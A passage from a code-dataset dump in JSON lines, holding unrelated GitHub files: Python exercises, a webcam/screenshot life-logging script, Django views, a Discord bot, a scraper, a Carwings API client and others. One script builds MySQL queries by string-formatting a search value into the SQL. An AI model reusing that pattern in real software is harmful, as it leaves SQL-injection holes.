print(\"F\")\n\n\nfruits = ['banana', 'orange', 'mango', 'lemon']\n# If a fruit doesn't exist in the list add the fruit to the list and print the modified list. If the fruit exists print('That fruit already exist in the list') # noqa: E501\n\n# inp = str(input(\"Ingrese o valide una fruta: \"))\n\ninp = \"Caballito\"\n\nif inp in fruits:\n print('That fruit already exist in the list')\nelse:\n fruits.append(inp)\n print(fruits)\n\n# Here we have a person dictionary. Feel free to modify it!\n\nperson = {\n 'first_name': 'Gerard',\n 'last_name': 'Bourguett',\n 'age': 30,\n 'country': 'Chile',\n 'is_married': False,\n 'skills': ['Javascript', 'HTML', 'Node', 'Python'],\n 'address': {\n 'street': 'Calle Falsa 123',\n 'zipcode': '02210'\n }\n}\n\n# * Check if the person dictionary has skills key, if so print out the middle skill in the skills list. # noqa: E501\n\nif \"skills\" in person:\n skills = person[\"skills\"]\n middle_skill = len(skills) // 2\n print('Skills: ', skills[middle_skill])\nelse:\n print(\"No hay :(\")\n\n# * Check if the person dictionary has skills key, if so check if the person has 'Python' skill and print out the result. # noqa: E501\n\nif \"skills\" in person:\n skills = person[\"skills\"]\n if \"Python\" in skills:\n print('Si tiene el esquil')\n else:\n print(\"No hay :(\")\nelse:\n print(\"Nel\")\n\n# * If a person skills has only JavaScript and React, print('He is a front end developer'), if the person skills has Node, Python, MongoDB, print('He is a backend developer'), if the person skills has React, Node and MongoDB, Print('He is a fullstack developer'), else print('unknown title') - for more accurate results more conditions can be nested! # noqa: E501\n\nif \"skills\" in person:\n skills = person['skills']\n if \"javaScript\" in skills and \"React\" in skills and len(skills) == 2:\n print(\"He is a front end developer\")\n elif \"Node\" in skills and \"Python\" in skills and \"MongoDB\" in skills:\n print(\"He is a backend developer\")\n elif \"Node\" in skills and \"React\" in skills and \"MongoDB\" in skills:\n print(\"He is a full-stack developer\")\n else:\n print(\"Unknown title\")\nelse:\n print(\"Unknown title\")\n \n\n# * If the person is married and if he lives in Chile, print the information in the following format: Asabeneh Yetayeh lives in Chile. He is married. 
# noqa: E501\n\nif person['country'] == \"Chile\" and person[\"is_married\"] == True:\n print(f\"{person['first_name']} {person['last_name']} lives in {person['country']}. He is married\") # noqa: E501\nelse:\n print(f\"{person['first_name']} {person['last_name']} lives in {person['country']}. He is not married\") # noqa: E501\n\n\n","repo_name":"gerardbourguett/python-autodidacta","sub_path":"day_9/condicionals.py","file_name":"condicionals.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30436394537","text":"import cv2\nfrom datetime import datetime\nimport os\nimport time\nimport pyscreenshot as ImageGrab\n\ndef auto_capture():\n while True:\n now_time = datetime.now()\n if now_time.time() < datetime(2018, 11, 8, 7, 0, 0).time():\n continue\n if now_time.time() > datetime(2018, 11, 8, 23, 0, 0).time():\n continue\n imgname_me = now_time.strftime(\"%Y%m%d_%H%M%S_me.jpg\")\n imgname_screen = now_time.strftime(\"%Y%m%d_%H%M%S_screen.jpg\")\n imgdir_me = now_time.strftime(\"/home/zhaokewei/life/images/日常/%Y%m%d/me\")\n imgdir_screen = now_time.strftime(\"/home/zhaokewei/life/images/日常/%Y%m%d/screen\")\n if not os.path.exists(imgdir_me):\n os.makedirs(imgdir_me)\n if not os.path.exists(imgdir_screen):\n os.makedirs(imgdir_screen)\n cap = cv2.VideoCapture(0)\n cap.set(3, 1920)\n cap.set(4, 1080)\n for i in range(10):\n ret, frame = cap.read()\n time.sleep(0.033)\n ret, frame = cap.read()\n if ret:\n cv2.imwrite(os.path.join(imgdir_me, imgname_me), frame)\n img_screen = ImageGrab.grab()\n img_screen.save(os.path.join(imgdir_screen, imgname_screen))\n cap.release()\n time.sleep(10 * 60)\n\n\nif __name__ == '__main__':\n auto_capture()\n","repo_name":"zhaokewei/auto_capture","sub_path":"auto_capture.py","file_name":"auto_capture.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71625051145","text":"from django.shortcuts import render, redirect\nfrom .models import Restaurant\nfrom .models import Review\nfrom django.db.models import Avg\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import RegisterForm, Restaurants\n\n\n# Create your views here.\n\n# Function to handle the search functionality\ndef search_venues(request):\n\n # If the search button is pressed\n if request.method == \"POST\":\n\n # Get the search value and filter the restaurants database based on the search\n searched = request.POST['searched']\n venues = Restaurant.objects.filter(name__contains=searched)\n\n # Return the results page and pass through the data\n return render(request, \"main/results.html\", {'searched': searched, 'venues': venues})\n else:\n return render(request, \"main/results.html\", {})\n\n\n# Function to return the home page\ndef home(response):\n return render(response, \"main/home.html\", {})\n\n\n# Function to handle the registration page\ndef signup(response):\n\n # If the submit button on the registration form is pressed\n if response.method == 'POST':\n form = RegisterForm(response.POST)\n\n # Store the forms data and save it to the database\n if form.is_valid():\n form.save()\n # Route to the users table\n return redirect('/users')\n else:\n form = RegisterForm()\n\n return render(response, \"registration/signup.html\", {\"form\": form})\n\n\n# Function to display the users table\ndef users(response):\n return 
render(response, \"main/users.html\", {\"users\": User.objects.all()})\n\n\n# Ensure the user must be logged in to leave a review\n@login_required\ndef leaveReview(request):\n\n # Get the restaurant list and convert to a list\n restaurant_list = list(Restaurant.objects.all())\n options = [r for r in restaurant_list]\n\n # If the submit button is pressed\n if request.method == 'POST':\n\n # Get the data from the form\n rest = request.POST.get('review-restaurant', 'ERROR')\n rating = request.POST.get('review-rating', 'ERROR')\n text = request.POST.get('review-text', 'ERROR')\n created_by = request.user\n\n # Get the restaurant\n rest = Restaurant.objects.filter(name__contains=rest)[0]\n\n # Create, store, and save the values for a new review\n r = Review()\n r.restaurant = rest\n r.created_by = created_by\n r.rating = rating\n r.text = text\n r.save()\n\n # Update restaurant rating average\n reviews = Review.objects.filter(restaurant__name__exact=rest.name)\n average = reviews.aggregate(Avg('rating'))\n rest.rating = round(average['rating__avg'], 2)\n rest.save()\n\n # Route to the leave a review page again\n return render(request, \"main/leaveReview.html\", {\"options\": options})\n\n\n# Function to handle explore Reviews page\ndef readReview(response):\n\n # Get the restaurant list with names and ids\n restaurant_list = list(Restaurant.objects.all())\n options = [r.name for r in restaurant_list]\n rest_id = [l.id for l in restaurant_list]\n\n # If the submit button is pressed\n if response.method == 'POST':\n\n # Save and pass through the search and filtered reviews\n searched = response.POST.get('review_search', 'ERROR')\n filtered = Review.objects.filter(restaurant__name__contains=searched)\n return render(response, \"main/readReview.html\", {\"options\": options, \"reviews\": filtered})\n\n else:\n return render(response, \"main/readReview.html\", {\"options\": options})\n\n\n# Function to handle the add a restaurant form\ndef restaurants(response):\n\n # If the submit button was pressed\n if response.method == 'POST':\n form = Restaurants(response.POST)\n\n # If the form is valid\n if form.is_valid():\n\n # Create a new restaurant, populate the fields, and save it to the database\n r = Restaurant()\n r.name = form.cleaned_data[\"name\"]\n r.address = form.cleaned_data[\"address\"]\n r.rating = form.cleaned_data[\"rating\"]\n r.food_type = form.cleaned_data[\"review\"]\n r.save()\n\n # Redirect to the restaurants table\n return redirect('/view_restaurants/')\n\n else:\n form = Restaurants()\n return render(response, \"main/restaurants.html\", {\"form\": form})\n\n\n# Function to display the restaurants table\ndef view_restaurants(response):\n return render(response, \"main/view_restaurants.html\", {\"restaurants\": Restaurant.objects.all()})\n\n\n\n\n","repo_name":"caxton-m/RateMyCampus-1","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9045654330","text":"import argparse\n\nimport numpy as np\nimport torch\nimport torch.utils.data as data_utils\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\nimport corner\n\nfrom deconv.gmm.sgd_deconv_gmm import SGDDeconvGMM\nfrom deconv.gmm.data import DeconvDataset\nfrom deconv.flow.svi import SVIFlow\nfrom deconv.flow.svi_gmm import SVIGMMFlow, SVIGMMExact\nfrom deconv.utils.data_gen import generate_mixture_data\n\nparser = 
argparse.ArgumentParser(description='Train SVI model on toy GMM.')\n\nparser.add_argument('-g', '--gmm', action='store_true')\nparser.add_argument('-s', '--svi-gmm', action='store_true')\nparser.add_argument('-x', '--svi-exact_gmm', action='store_true')\nparser.add_argument('-f', '--freeze_gmm', action='store_true')\nparser.add_argument('-k', '--samples', type=int)\nparser.add_argument('-e', '--epochs', type=int)\nparser.add_argument('-l', '--learning-rate', type=float)\nparser.add_argument('-i', '--use-iwae', action='store_true')\nparser.add_argument('-c', '--grad_clip_norm', type=float)\nparser.add_argument('-m', '--hidden-features', type=int)\nparser.add_argument('output_prefix')\n\nargs = parser.parse_args()\n\nK = 3\nD = 2\nN = 50000\nN_val = int(0.25 * N)\n\nref_gmm, S, (z_train, x_train), (z_val, x_val), _ = generate_mixture_data()\n\nif args.gmm:\n if args.svi_gmm:\n train_data = DeconvDataset(x_train.squeeze(), torch.cholesky(S.repeat(N, 1, 1)))\n val_data = DeconvDataset(x_val.squeeze(), torch.cholesky(S.repeat(N_val, 1, 1)))\n if args.svi_exact_gmm:\n svi_gmm = SVIGMMExact(\n 2,\n 5,\n device=torch.device('cuda'),\n batch_size=512,\n epochs=args.epochs,\n lr=args.learning_rate,\n n_samples=args.samples,\n use_iwae=args.use_iwae,\n context_size=64,\n hidden_features=args.hidden_features\n )\n else:\n svi_gmm = SVIGMMFlow(\n 2,\n 5,\n device=torch.device('cuda'),\n batch_size=512,\n epochs=args.epochs,\n lr=args.learning_rate,\n n_samples=args.samples,\n use_iwae=args.use_iwae,\n context_size=64,\n hidden_features=args.hidden_features\n )\n if args.freeze_gmm:\n svi_gmm.model._prior.load_state_dict(ref_gmm.module.state_dict())\n for param in svi_gmm.model._prior.parameters():\n param.requires_grad = False\n\n svi_gmm.fit(train_data, val_data=val_data)\n torch.save(svi_gmm.model.state_dict(), args.output_prefix + '_params.pt')\n else:\n train_data = DeconvDataset(x_train.squeeze(), S.repeat(N, 1, 1))\n val_data = DeconvDataset(x_val.squeeze(), S.repeat(N_val, 1, 1))\n gmm = SGDDeconvGMM(\n K,\n D,\n batch_size=200,\n epochs=args.epochs,\n lr=args.learning_rate,\n device=torch.device('cuda')\n )\n gmm.fit(train_data, val_data=val_data, verbose=True)\n torch.save(gmm.module.state_dict(), args.output_prefix + '_params.pt')\nelse:\n train_data = DeconvDataset(x_train.squeeze(), torch.cholesky(S.repeat(N, 1, 1)))\n val_data = DeconvDataset(x_val.squeeze(), torch.cholesky(S.repeat(N_val, 1, 1)))\n svi = SVIFlow(\n 2,\n 5,\n device=torch.device('cuda'),\n batch_size=512,\n epochs=args.epochs,\n lr=args.learning_rate,\n n_samples=args.samples,\n use_iwae=args.use_iwae,\n grad_clip_norm=args.grad_clip_norm,\n context_size=64,\n hidden_features=args.hidden_features\n )\n svi.fit(train_data, val_data=val_data)\n\n torch.save(svi.model.state_dict(), args.output_prefix + '_params.pt')\n","repo_name":"bayesiains/density-deconvolution","sub_path":"experiments/flows/mixture_compare.py","file_name":"mixture_compare.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"70020988106","text":"import MySQLdb\nimport json\nfrom flask import Flask\nimport os\napp = Flask(__name__)\n\n\n# query = \"select pid, pname, r_score from products order by r_score DESC\"\nsearchValue = \"Mivi\"\n# sql_ = (\"select pid, pname, r_score from products where instr(pname, '%s') > 0;\" % (searchValue))\nq = (\"select * from products left join links on products.pid=links.pid where instr(pname, '%s') > 0\" % 
(searchValue))\n# link = 'data/search.json'\n# sql = (\"select * from %s limit %s, %s;\" % (table, low, size))\n\n\ndef get_rankings(sql, file_link):\n db = MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"\", db=\"scoutlab\")\n cur = db.cursor(MySQLdb.cursors.DictCursor)\n cur.execute(sql)\n data = cur.fetchall()\n with app.app_context():\n res = dict(zip(tuple(range(0, len(data))), data))\n print(res)\n open(file_link, 'w').close()\n with open(file_link, 'w', encoding='utf-8') as f:\n while os.stat(file_link).st_size != 0:\n print(\"Error: file is not empty!\")\n open(file_link, 'w').close()\n json.dump(res, f, ensure_ascii=False, indent=4)\n\n cur.close()\n db.close()\n\n\nget_rankings(q, \"data/search.json\")\n","repo_name":"chandanXP/scoutlab","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22516579927","text":"class Solution(object):\n def merge(self, intervals):\n intervals.sort(key=lambda a: a[0])\n\n res, currentInterval = [], intervals[0]\n\n for i in range(1, len(intervals)):\n if currentInterval[1] < intervals[i][0]:\n res.append(currentInterval)\n currentInterval = intervals[i]\n else:\n currentInterval = [min(currentInterval[0], intervals[i][0]), max(currentInterval[1], intervals[i][1])]\n\n res.append(currentInterval)\n return res\n\nanswer = Solution()\nprint(answer.merge([[1,3],[2,6],[8,10],[15,18]]))\nprint(answer.merge([[1,3]]))\n","repo_name":"abedmohammed/leetcode","sub_path":"56MergeIntervals.py","file_name":"56MergeIntervals.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37095476179","text":"'''\n A\n / \\\n B C\n / \\ \\\nD E F\n \\\n G\n'''\n#In python we use dictionary to describe a graph in Adjacency List format. 
\n#We need not repeat a vertex again and again but for the heck of it I have.\nGraph = {\n \"A\":[\"B\",\"C\"],\n \"B\":[\"A\",\"D\",\"E\"],\n \"C\":[\"A\",\"F\"],\n \"D\":[\"B\"],\n \"E\":[\"B\",\"G\"],\n \"F\":[\"C\"],\n \"G\":[\"E\"]\n}\ndef BFS(Graph,start):\n visited = []\n queue = []\n visited.append(start)\n queue.append(start)\n while queue:\n v = queue.pop(0) #queue follows First in First out\n print(v,end = \" \")\n for neighbour in Graph[v]:\n if neighbour not in visited:\n visited.append(neighbour)\n queue.append(neighbour)\ndef DFS(Graph,start):\n visited = []\n stack = []\n visited.append(start)\n stack.append(start)\n while stack:\n v = stack.pop(-1) #Stack follows First In Last Out\n print(v,end = \" \")\n for neighbour in Graph[v]:\n if neighbour not in visited:\n visited.append(neighbour)\n stack.append(neighbour)\n\nBFS(Graph,\"A\")\nprint()\nDFS(Graph,\"A\")\n\n\n\n\n ","repo_name":"SohamSinghal/DataStructures","sub_path":"Graph/BFS_and_DFS.py","file_name":"BFS_and_DFS.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23392605332","text":"import os\nimport json\n\nimport discord\nfrom discord.ext import commands\nfrom discord_slash import SlashCommand, SlashContext\nfrom discord_slash.utils.manage_commands import create_option\nfrom discord_slash.model import SlashCommandOptionType\n\nfrom adalotl import Adalotl\n\nfrom dotenv import load_dotenv\nload_dotenv()\nDISCORD_TOKEN = os.getenv('DISCORD_TOKEN')\n\nbot = commands.Bot(command_prefix=\"!\", intents=discord.Intents.default())\nslash = SlashCommand(bot, sync_commands=True)\n\nadalotl_command_options = create_option(\n name = \"number\",\n description = \"This is the the Adalotl number, for example, for Adalotl 007, this will be '007'\",\n option_type = SlashCommandOptionType.INTEGER,\n required = True\n )\n\n@slash.slash(name=\"adalotl\", options=[adalotl_command_options])\nasync def _adalotl(ctx: SlashContext, number):\n await ctx.defer()\n\n if (number < 1 or number > 888):\n await ctx.send('Hey!, that adalotl does not exist! 
:<')\n return\n\n number = f\"{number:03}\"\n\n adalotl = None\n try:\n adalotl = Adalotl(number)\n except TypeError as e:\n await ctx.send('Adalotl not found or not minted yet')\n return\n\n embed_image = discord.Embed(title=f\"Adalotl {number}\")\n embed_image.set_image(url=adalotl.image_url)\n\n embed_attributes = discord.Embed(title='Attributes')\n for attribute in adalotl.attributes:\n embed_attributes.add_field(\n name='\\u200b',\n value=f\"```{attribute}```\",\n inline=True\n )\n\n embed_attributes.add_field(\n name='\\u200b',\n value=f\"```{adalotl.morph}```\",\n inline=True\n )\n\n await ctx.send(embeds=[embed_image, embed_attributes])\n\nbot.run(DISCORD_TOKEN)\n","repo_name":"joecabezas/adalotls-discord-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2805489258","text":"import json\r\nfrom jinja2 import Environment, FileSystemLoader\r\n\r\nwith open (\"restaurants.json\", \"r\") as d:\r\n restaurants=json.load(d)\r\n\r\n fileLoader = FileSystemLoader(\"templates\")\r\n env = Environment(loader=fileLoader)\r\n\r\n rendered = env.get_template(\"dynamic_abrilq.html\").render(restaurants = restaurants)\r\n\r\n fileName = \"index.html\"\r\n\r\n with open(f\"./site/{fileName}\", \"w\") as f:\r\n f.write(rendered)\r\n\r\n\r\n","repo_name":"abrilquinterog/dynamic-html-jinja","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16755253689","text":"import requests\n\nfrom bs4 import BeautifulSoup\n\nfrom scrap import ScraperBot\n\nimport csv\n\n\n\n\ndef ChristiesItems(Make=None,Model=None):\n if Make and Model is not None:\n print(\"[+] Success! 
Scrap Bot Starting!\")\n SearchUrl = \"https://www.christies.com/lotfinder/searchresults.aspx?sc_lang=en&lid=1&action=search&searchfrom=header&entry=\"+Make+\"%20\"+Model\n SoldLotsUrl = SearchUrl+\"&searchtype=p&pg=all\"\n page = requests.get(SoldLotsUrl)\n data = page.content\n htmldata = BeautifulSoup(data, \"html.parser\")\n file = open(Make+Model+'.csv', 'w', newline ='')\n count = 0\n with file:\n header = ['Month','Day','Year','Value','PublicationYear','Make','Model','Source','Link']\n writer = csv.DictWriter(file, fieldnames = header) \n writer.writeheader() \n for ul in htmldata.find_all('div',{\"class\":\"gridView\"}):\n for li in ul.find_all('div',{\"class\":\"image-overlay-box\"}):\n anchor = li.find('a')\n scrap_url = anchor.get('href')\n status = ScraperBot(Url=scrap_url,Make=Make,Model=Model,writer=writer)\n if status == False:\n count = count + 1\n print(\"Make and Model Non stop not matched in string count =\",count)\n if count == 10:\n print(\"Make and Model Non stop not matched limit reached to 10 Quit scraper\")\n break\n if status == True:\n count = 0\n print(\"[+] Christies data Scrap Done check csv file in current directory......>>>>>>>\")\n else:\n raise Exception(\"=====>Make and Model not should be None<=====\")","repo_name":"pythexcel/ChristieScraper","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"738084382","text":"from typing import Union, Callable\nimport torch.nn.functional as F\nfrom torch import nn, Tensor\nfrom torch.nn import GELU\n\n\nclass PositionwiseFeedForward(nn.Module):\n \"Implements FFN equation.\"\n\n def __init__(self, d_model, d_ff, dropout=0.1, dtype=None, device =None):\n super(PositionwiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff, dtype=dtype, device=device)\n self.w_2 = nn.Linear(d_ff, d_model, dtype=dtype, device=device)\n self.dropout = nn.Dropout(dropout)\n self.activation = GELU()\n\n def forward(self, x):\n return self.w_2(self.dropout(self.activation(self.w_1(x))))\n\n\nclass ActionTransformerEncoderBlock(nn.Module):\n def __init__(self, slots_dim: int, nhead: int, action_dim: int, dim_feedforward_coef: int = 4, reverse_cross_attention=False,\n norm_first=True, dropout: float = 0.1, layer_norm_eps: float = 1e-5, batch_first: bool = False,\n device=None, dtype=None):\n super().__init__()\n self.slots_dim = slots_dim\n self.nhead = nhead\n self.dim_feedforward_coef = dim_feedforward_coef\n self.norm_first = norm_first\n self.reverse_cross_attention = reverse_cross_attention\n\n self.norm_slots = nn.LayerNorm(slots_dim, eps=layer_norm_eps)\n self.norm_action = nn.LayerNorm(action_dim, eps=layer_norm_eps)\n\n self.attention = nn.MultiheadAttention(num_heads=nhead,\n embed_dim=action_dim if reverse_cross_attention else slots_dim,\n dropout=dropout,\n dtype=dtype,\n batch_first=batch_first,\n device=device,\n kdim=slots_dim if reverse_cross_attention else action_dim,\n vdim=slots_dim if reverse_cross_attention else action_dim)\n\n query_dim = action_dim if reverse_cross_attention else slots_dim\n self.dim_feedforward = dim_feedforward_coef * query_dim\n\n self.ffd = PositionwiseFeedForward(d_model=slots_dim,\n d_ff=self.dim_feedforward ,\n dtype=dtype,\n device=device)\n\n def forward(self, slots, action):\n slots = self.norm_slots(slots)\n action = self.norm_action(action)\n q, k, v = (action, slots, slots) if self.reverse_cross_attention else (slots, action, 
action)\n atten = self.attention(q, k, v)\n out = self.ffd(atten)\n return out\n\n\nclass ActionTransformerEncoder(nn.Module):\n def __init__(self, num_layers, num_heads, slots_dim, action_dim, dim_ffd_coef=4, norm_first=True,\n dropout: float = 0.1, layer_norm_eps: float = 1e-5, batch_first: bool = False,\n device=None, dtype=None):\n super().__init__()\n self.num_layers = num_layers\n self.num_heads = num_heads\n self.slots_dim = slots_dim\n self.action_dim = action_dim\n self.ddm_ffd_coef = dim_ffd_coef\n self.dropout = dropout\n self.layer_norm_eps = layer_norm_eps\n self.norm_first = norm_first\n self.batch_first = batch_first\n self.norm = nn.LayerNorm(slots_dim, eps=layer_norm_eps)\n\n self.layers = self._build_layers(device, dtype)\n def _build_layers(self, device=None, dtype=None):\n # if self.num_layers < 3:\n # raise ValueError(\"Should be at least\")\n layers = nn.ModuleList()\n for k in range(self.num_layers):\n if k == self.num_layers - 1:\n layers.append(ActionTransformerEncoderBlock(\n slots_dim=self.slots_dim,\n nhead=self.num_heads,\n action_dim=self.action_dim,\n dim_feedforward_coef=self.ddm_ffd_coef,\n norm_first=self.norm_first,\n dtype=dtype,\n device=device,\n ))\n continue\n\n layers.append(nn.TransformerEncoderLayer(\n d_model=self.slots_dim,\n nhead=self.num_heads,\n dim_feedforward=self.slots_dim * self.ddm_ffd_coef,\n dropout=self.dropout,\n norm_first=self.norm_first,\n batch_first=self.batch_first,\n device=device,\n dtype=dtype\n ))\n\n return layers\n\n def forward(self, slots, actions):\n for idx, layer in enumerate(self.layers):\n if idx == len(self.num_layers - 1):\n return self.layers(slots, actions)\n slots = self.layers(slots)\n\n\n\n\n\n","repo_name":"v3code/slotformer-atari","sub_path":"slotformer/video_prediction/models/action_transformer.py","file_name":"action_transformer.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18699109385","text":"import os\r\nfrom setuptools import setup\r\nimport os.path\r\nimport beyonic\r\n\r\n\r\ndef read(*rnames):\r\n return open(os.path.join(os.path.dirname(__file__), *rnames)).read()\r\n\r\n\r\nVERSION = beyonic.__version__\r\n\r\nfrom os import path\r\nfrom io import open\r\nthis_directory = path.abspath(path.dirname(__file__))\r\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\r\n long_description = f.read()\r\n\r\nsetup(\r\n name=\"beyonic\",\r\n version=VERSION,\r\n description=\"The official Python client for the MfsAfrica.com API\",\r\n author=\"Beyonic\",\r\n author_email=\"info@mfsafrica.com\",\r\n long_description=long_description,\r\n long_description_content_type='text/markdown',\r\n packages=[\"beyonic\", \"beyonic.apis\"],\r\n install_requires=[\"requests\"],\r\n license=\"MIT\",\r\n keywords=[\"api\", \"mobile payments\", \"mobile money\", \"beyonic\", \"mpesa\"],\r\n url=\"https://mfsafrica.com\",\r\n classifiers=[\r\n \"Development Status :: 3 - Alpha\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n \"Programming Language :: Python\",\r\n \"Programming Language :: Python :: 3\",\r\n \"Programming Language :: Python :: 3.5\",\r\n \"Programming Language :: Python :: 3.6\",\r\n \"Programming Language :: Python :: Implementation :: PyPy\",\r\n \"Topic :: Software Development :: Libraries :: Python Modules\",\r\n 
],\r\n)\r\n","repo_name":"beyonic/beyonic-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"21530054800","text":"import logging\nfrom datetime import timedelta, datetime\nimport pycarwings2\n\nlog = logging.getLogger(__name__)\n\n\ndef _time_remaining(t):\n minutes = float(0)\n if t:\n if (\"hours\" in t) and t[\"hours\"]:\n minutes = 60 * float(t[\"hours\"])\n elif (\"HourRequiredToFull\" in t) and t[\"HourRequiredToFull\"]:\n minutes = 60 * float(t[\"HourRequiredToFull\"])\n if (\"minutes\" in t) and t[\"minutes\"]:\n minutes += float(t[\"minutes\"])\n elif (\"MinutesRequiredToFull\" in t) and t[\"MinutesRequiredToFull\"]:\n minutes += float(t[\"MinutesRequiredToFull\"])\n\n return minutes\n\n\nclass CarwingsResponse:\n def __init__(self, response):\n op_result = None\n if (\"operationResult\" in response):\n op_result = response[\"operationResult\"]\n elif (\"OperationResult\" in response):\n op_result = response[\"OperationResult\"]\n\n # seems to indicate that the vehicle cannot be reached\n if (\"ELECTRIC_WAVE_ABNORMAL\" == op_result):\n log.error(\"could not establish communications with vehicle\")\n raise pycarwings2.CarwingsError(\"could not establish communications with vehicle\")\n\n def _set_cruising_ranges(self, status, off_key=\"cruisingRangeAcOff\", on_key=\"cruisingRangeAcOn\"):\n if off_key in status:\n self.cruising_range_ac_off_km = float(status[off_key]) / 1000\n if on_key in status:\n self.cruising_range_ac_on_km = float(status[on_key]) / 1000\n\n def _set_timestamp(self, status):\n self.timestamp = datetime.strptime(status[\"timeStamp\"], \"%Y-%m-%d %H:%M:%S\") # \"2016-01-02 17:17:38\"\n\n\nclass CarwingsInitialAppResponse(CarwingsResponse):\n def __init__(self, response):\n CarwingsResponse.__init__(self, response)\n self.baseprm = response[\"baseprm\"]\n\n\nclass CarwingsLoginResponse(CarwingsResponse):\n \"\"\"\n example JSON response to login:\n {\n \"status\":200,\n \"message\":\"success\",\n \"sessionId\":\"12345678-1234-1234-1234-1234567890\",\n \"VehicleInfoList\": {\n \"VehicleInfo\": [\n {\n \"charger20066\":\"false\",\n \"nickname\":\"LEAF\",\n \"telematicsEnabled\":\"true\",\n \"vin\":\"1ABCDEFG2HIJKLM3N\"\n }\n ],\n \"vehicleInfo\": [\n {\n \"charger20066\":\"false\",\n \"nickname\":\"LEAF\",\n \"telematicsEnabled\":\"true\",\n \"vin\":\"1ABCDEFG2HIJKLM3N\"\n }\n ]\n },\n \"vehicle\": {\n \"profile\": {\n \"vin\":\"1ABCDEFG2HIJKLM3N\",\n \"gdcUserId\":\"FG12345678\",\n \"gdcPassword\":\"password\",\n \"encAuthToken\":\"ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\",\n \"dcmId\":\"123456789012\",\n \"nickname\":\"Alpha124\",\n \"status\":\"ACCEPTED\",\n \"statusDate\": \"Aug 15, 2015 07:00 PM\"\n }\n },\n \"EncAuthToken\":\"ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\",\n \"CustomerInfo\": {\n \"UserId\":\"AB12345678\",\n \"Language\":\"en-US\",\n \"Timezone\":\"America/New_York\",\n \"RegionCode\":\"NNA\",\n \"OwnerId\":\"1234567890\",\n \"Nickname\":\"Bravo456\",\n \"Country\":\"US\",\n \"VehicleImage\":\"/content/language/default/images/img/ph_car.jpg\",\n \"UserVehicleBoundDurationSec\":\"999971200\",\n \"VehicleInfo\": {\n \"VIN\":\"1ABCDEFG2HIJKLM3N\",\n \"DCMID\":\"201212345678\",\n \"SIMID\":\"12345678901234567890\",\n \"NAVIID\":\"1234567890\",\n \"EncryptedNAVIID\":\"1234567890ABCDEFGHIJKLMNOP\",\n 
\"MSN\":\"123456789012345\",\n \"LastVehicleLoginTime\":\"\",\n \"UserVehicleBoundTime\":\"2015-08-17T14:16:32Z\",\n \"LastDCMUseTime\":\"\"\n }\n },\n \"UserInfoRevisionNo\":\"1\"\n }\n \"\"\"\n def __init__(self, response):\n CarwingsResponse.__init__(self, response)\n\n profile = response[\"vehicle\"][\"profile\"]\n self.gdc_user_id = profile[\"gdcUserId\"]\n self.dcm_id = profile[\"dcmId\"]\n self.vin = profile[\"vin\"]\n\n # vehicleInfo block may be top level, or contained in a VehicleInfoList object;\n # why it's sometimes one way and sometimes another is not clear.\n if \"VehicleInfoList\" in response:\n self.nickname = response[\"VehicleInfoList\"][\"vehicleInfo\"][0][\"nickname\"]\n self.custom_sessionid = response[\"VehicleInfoList\"][\"vehicleInfo\"][0][\"custom_sessionid\"]\n elif \"vehicleInfo\" in response:\n self.nickname = response[\"vehicleInfo\"][0][\"nickname\"]\n self.custom_sessionid = response[\"vehicleInfo\"][0][\"custom_sessionid\"]\n\n customer_info = response[\"CustomerInfo\"]\n self.tz = customer_info[\"Timezone\"]\n self.language = customer_info[\"Language\"]\n self.user_vehicle_bound_time = customer_info[\"VehicleInfo\"][\"UserVehicleBoundTime\"]\n\n self.leafs = [{\n \"vin\": self.vin,\n \"nickname\": self.nickname,\n \"bound_time\": self.user_vehicle_bound_time\n }]\n\n\nclass CarwingsBatteryStatusResponse(CarwingsResponse):\n \"\"\"\n Note that before December 2018 this returned a response. Between Dec-2018 and Aug-2019\n it did not return a response from the Nissan Servers. As of Aug 2019 a response is now\n returned again.\n\n # Original\n {\n \"status\": 200,\n \"message\": \"success\",\n \"responseFlag\": \"1\",\n 